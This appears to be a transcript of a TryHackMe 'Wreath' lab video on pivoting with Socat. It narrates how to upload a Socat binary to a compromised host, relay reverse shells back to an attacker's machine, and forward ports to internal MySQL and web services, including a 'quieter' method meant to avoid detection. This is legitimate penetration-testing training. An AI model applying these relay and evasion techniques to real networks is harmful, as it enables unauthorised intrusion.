Hey everyone, welcome back to another video here on the Wreath network on TryHackMe. Today we're going to be taking a look at task 13, pivoting with Socat. Socat is not just great for fully stable Linux shells, it's also superb for port forwarding. The one big disadvantage of Socat, aside from the frequent problems people have learning the syntax because it is a little bit different, is that it is very rarely installed by default on a target. That being said, static binaries are easy to find for both Linux and Windows, so keep in mind it is for both systems. Bear in mind that the Windows version is unlikely to bypass antivirus software by default, so custom compilation might be required. I can confirm that if you download this, my antivirus, it set off right away with it. It was very upset that I had Socat on my computer and quarantined it immediately. Before we begin, it's worth noting, if you have completed the What the Shell room, you will know that Socat can be used to create encrypted connections, which is one of the coolest parts of it. The techniques shown here could be combined with the encryption options detailed in the shells room to create encrypted port forwards and relays. To avoid overly complicating this section, this technique will not be taught here, however it's well worth experimenting with this in your own time. I recommend this is a good opportunity that either once you're done with this task or once you're done with the lab on the whole, go through it. You can reset the room using the reset button and start doing it either with different techniques, or you can do it without following the instructions at all and just see if you can make it through by yourself. It's a great test of your pen testing skills in that way. Whilst the following techniques could not be used to set up a full proxy into a target network, it's quite possible to use them to successfully forward ports from both Linux and Windows compromised targets. In particular, Socat makes a very good relay. For example, if you are attempting to get a shell on a target that does not have a direct connection back to your attacking computer, you can use Socat to set up a relay on the currently compromised machine. This listens for the reverse shell from the target and then forwards it immediately back to the attacking box. And you can see that here in this diagram. So copy the diagram that we saw in an earlier task where we have the forwarder right here, that maybe we get a reverse shell on this machine. It calls back to the forwarder, and the forwarder says, hold on, let me pass you along. It's like call forwarding or mail forwarding in that way. It's best to think of Socat as a way to join two things together, kind of like a portal gun in the Portal games. That is a great way to think of it. It creates a link between two different locations. This could be two ports on the same machine. It could be used to create a relay between two different machines. It could be used to create a connection between a port and a file on the listening machine, or many other similar things. It is an extremely powerful tool, which is well worth looking into in your own time. The Socat is incredibly flexible, and it's well worth looking into just to have it as another tool, because there are certain situations that you will encounter that it's a, hey, Socat makes a lot of sense for this, and you might not otherwise be able to do something like that very easily. Let's see. Generally speaking, however, hackers tend to use it to either create, reverse, or bind shells, or, as in the example above, create a port forward. Specifically in the above example, we're creating a port forward from a port on the compromised server to a listening port on our own box. We could do this the other way, though, by either forwarding a connection from the attacking machine to a target inside the network, or creating a direct link between a listening port on the attacking machine with the service on the internal server. Again, we're sending things along. We're just connecting 2 points. This latter application is especially useful as it does not require opening a port on the compromised server. Before using Socat, it will usually be necessary to download a binary for it, then upload it on the box. And again, keep in mind, this is probably going to trip off your antivirus. Do not download this on Windows. Windows will freak out. Do this on your Kali box. For example, with a Python web server, we can serve that up with sudo python3-m http.server and then 80, and then we can just curl it to transfer it to the box. Nice and easy. And you can see curl, and then we're outputting it into Socat, and then our username, again, making sure that we're using this formatting so that we are making sure that we're keeping our lab clean for just us, or making sure that we're not overwriting other people's files. And then ampersand chmod plus x, we're making it executable. So you can see that we're doing that and then making it executable, and we can see that in the second screenshot here that we've served it up from our Python web server. Again, this part is done on our attacking machine. this part is done on our victim machine. With the binaries uploaded, let's have a look at each of the above scenarios in turn. This uploads the Socat binary with your username in the title. However, the example commands given in the rest of this task will refer to the binary simply as Socat. So we'll go through all this, and then once I'm all the way through this, or whenever it instructs us to create that reverse connection, we will go ahead and do that. I think that might be down another task, but we'll return to that before we move on to the next section. Reverse shell relay. In this scenario, we are using Socat to create a relay for us to send a reverse shell back to our own attacking machine, as in the diagram above. First, let's start a standard netcat listener on our attacking box. So sudo netcat, and then we have our port that we're listening on and specifying that we're listening, and in verbose mode, and then the port that we're listening on. Next, on the compromised server, use the following command to start the relay. So we can do Socat TCP-L, and then we specify the port that we're listening on, or that we want to have the traffic relayed to, and then TCP attacking machine, and then the port that we're connecting to, and then we're backgrounding it at the end. Note, the order of the two addresses matters here. Make sure to open the listening port first, then connect back to the attacking machine, because Socat's going to do it in that order. From here, we can then create a reverse shell to the newly opened port 8000 on the compromised server. This is demonstrated in the following screenshot using Socat on the remote server to simulate receiving a reverse shell from the target server. So you can see that we've got a demo right down here for that. So we have the listener here. It looks like Mir has created a shortcut just because, and that's very helpful, especially if you're doing this a lot, to just make a shortcut command for yourself. And then you can see that we are starting that connection up here. Note, you do want to start your listener first, and then you can do all this up here. And you can see once we have that listener going, we have this connection back, and we have command execution. A brief explanation of the above command: TCP-L:8000 is used to create the first half of the connection. An IPv4 listener on TCP port 8000 of the target machine. TCP:attacking_IP, again, replace that with the IP of your attacking machine, :443 connects back to our local IP on port 443. The attacking _IP obviously needs to be filled in correctly for this to work, and then ampersand background to the listener, turning it into a job so that we can use or still use the shell to execute other commands. The relay connects back to a listener, started using an alias to a standard netcat listener, and you can see the alias right there. In this way, we can set up a relay to send reverse shells through a compromised system back to our own attacking machine. This technique can also be chained quite easily. However, in many cases, it may be easier to just upload a static copy of netcat to receive your reverse shell directly on the compromised server. Port forwarding. Easy. The quick and easy way to set up a port forward with Socat is quite simply to open up a listening port on the compromised server and redirect whatever comes into it to the target server. For example, if the compromised server is 10.10.10.5 and the target is port 3306, so MySQL, of 10.10.10.10, we could use the following command. Note, this is running on the compromised server to create a port forward. So we have Socat. Again, this assumes we've already uploaded the binary. We're making that TCP listening connection here on, it looks like we're listening on 33060, fork reuse address. So this is going to take incoming connections and fork them off into different threads so that we can still have this port listening for us. And then it looks like we have TCP. So we're making that connection to this machine on port 3306 and then backgrounding it. This opens up port 33060 on the compromised server and redirects the input from the attacking machine into the intended target server, essentially giving us access to presumably a MySQL database because of the port that we're seeing there, running on our target of 10.10.10.10. This is essentially just redirecting it. Think of it as, you know, a traffic light, except we're changing the way that traffic is flowing, and we're just opening up that avenue for traffic on our compromised machine to get to the target that we want. The fork option is used to put every connection into a new process, and the reuse ADDR option means that the port stays open after a connection is made to it. Combined, they allow us to use the same port forward for more than just one connection. Once again, we use the ampersand to background the shell, allowing us to keep using the same terminal session on the compromised server for other things, which is great. You do always want to do that, so you always have that shell open for yourself if you need it. We can now connect to port 33060 on the relay, so 10.10.10.5, and have our connection directly relayed to our intended target of 10.10.10.10 on the MySQL port of 3306. And let's talk about port forwarding the quiet way. The previous technique is quick and easy, but it opens up a port on the compromised server, so that would be similar to a bind shell in that situation, which could potentially be spotted by any kind of host or network scanning. Whilst the risk is not massive, there is a pretty big risk there actually if you are on a monitored network. It pays to know a slightly quieter method of port forwarding with Socat. So one quick note on that, since this is a shared public network for people that are using it, you're sharing it with other users, this is going to pick up on any scans that are going on if other people are scanning the box, so I recommend not just leaving a bind port open because it might have issues for whatever reason, or other people might see it open and get really confused, so just be careful with that. This method is marginally more complex, but doesn't require opening up a port externally on the compromised server, which we want to avoid if possible. First of all, on our own attacking network, we issue the following command, or attacking machine rather. Socat TCP-L 8001 TCP-L 8000 fork use ADDR, and then ampersand that. This opens up two ports, 8000 and 8001, creating a local port relay. What goes in one of them will come out the other. For this reason, port 8000 also has the fork and reuse ADDR options set to allow us to create more than one connection using this port forward. Next, on the compromised relay server 10.10.10.5, in the previous example, we executed this command. So we have Socat TCP attacking _IP and then 8001, and then TCP target IP, target port, and then we're going to fork that connection so that we can split it off into a thread and then ampersand to background it. And again, this is the compromised relay server that we're talking about right now. This makes a connection between our listening port of 8001 on the attacking machine and the open port of the target server. To use our previous example, we could enter this command as Socat TCP, and then we have the IPs in question here for the example. This would create a link between port 8000 on our attacking machine and port 80 on the intended target of 10.10.10.10, meaning that we could go to localhost 8000 in our attacking machine's web browser to load the web page served on the target of quad 10s and then port 80. This is quite a complex scenario to visualize, so let's quickly run through what happens when you try to access the web page in your browser. This is something that I actually do recommend drawing out as well because it can help to visualize and sort of walk through where that connection is going as it goes from host to host to host. The request goes to our local host, so our own attacking machine, on port 8000. Due to the Socat listener we started on our own machine, anything that goes in port 8000 comes out of port 8001. Think of it as just kind of a U-turn. Port 8001 is directly connected to the Socat process we ran on the compromised server, meaning that anything coming out of port 8001 gets sent to the compromised server, where it gets relayed to port 8000 on the target server. This almost reminds me of the old marble contraptions you could build. Think of it this way: you're just passing around that connection, and in the case of that example, it would be a marble just going between machine to machine. One thing to note with the connection on the machine that we've compromised, we did not specify reuse ADDR, so we're not going to allow that port to stay open. We're using that for us, and then we don't leave that port open to potentially get detected. The process is then reversed when the target sends the response. So the response is sent to the Socat process on the compromised server because that's what's between us and that machine. What goes in the process comes out on the other side, which happens to link straight to port 8001 on our attacking machine. Anything that goes in 8001 on our machine goes around that U-turn and then goes to port 8000 on our attacking machine, which is where our web browser just waits and receives its response. Thus, the page is received and rendered. We have now achieved the same thing as previously, but without opening any ports on the server. And you can see how this is a lot cleaner because we're not creating that sort of bind connection where we have that backdoor connection waiting to be caught. Finally, we've learned how to create backgrounded Socat port relays, or forwards and relays, but it's important to also know how to close these. The solution is simple. Run the jobs command in your terminal, then kill any Socat processes using kill and then the number right there. So we can see that we've started a Socat process up here. We're listing the jobs running in the terminal, and we can see Socat's running, and we should have a process number, or it looks like we're just killing that first one, which is 1 right there. And then we kill it, and then we see that it's exiting, running jobs again, and then we see that no jobs are running. So we've closed that Socat connection successfully. For the following questions, assume that we are working with a local copy of Socat called Socat in the current directory. So we're working with something that's already on the machine. Which Socat option allows you to reuse the same listening port for more than one connection? That is going to be that reuse ADDR. Again, that came into play when we were talking about how we didn't end up using that on when we didn't want to leave that port open. If your attacking IP is 10.10.2020, how would you relay to a reverse shell to TCP port 443 on your attacking machine using a static copy of Socat in the current directory? Use TCP port 8000 for the server listener and do not background the process. So we're using, again, our local copy of Socat that's in our current working directory. TCP-L, and then we have the port that we are going to be listening on, which is 8000, and then we do space TCP and the connection that we are making 10.10.2020, and then we're connecting to port 443. Again, this is specified that we're using TCP, and this is the attacking IP that we're using. So again, we're creating that reverse relay or reverse shell to our attacking machine in this specific example. What command would you use to forward TCP port 2222 on a compromised server to 10.10.10.10.22 using a static copy of Socat in the current directory and background the process? And we're just going to use the easy method here by leaving that port open. We can do that with Socat, period /Socat, again, using the same one in their current directory, TCP-L, and we are forwarding 2222, and we are going to fork that, reuse ADDR because we are doing the easy method for this, and then we're making that TCP connection to 10.10.10.10.22, and then the last thing that we need to do is background that process. And let me go ahead, because that was kind of a long command, put that up here, and we'll mark submit on that. And then bonus question, optional, try to create an encrypted port forward or relay using the OpenSSL options in Socat. Task 7 of the shells room may help with this. I'm not going to show that off for the sake of this video. If you want to play around with that, and I definitely do recommend that, check that out either at this point if you want. Again, the intro, the shells room is fantastic, especially for wrapping your head around the different shells that you can have, and I do wholly recommend this. I'm going to mark that as completed. Again, if you are not feeling confident, you don't necessarily need to do that, so just keep that in mind. I do recommend playing around with it, though, because it can give you that more practice with doing this port forwarding and getting used to wrapping your head around all this, because it can be a lot. Otherwise, that is going to do it for this task. I will see you guys in the next video when we do task 14 looking at Chisel. But until then, happy hacking.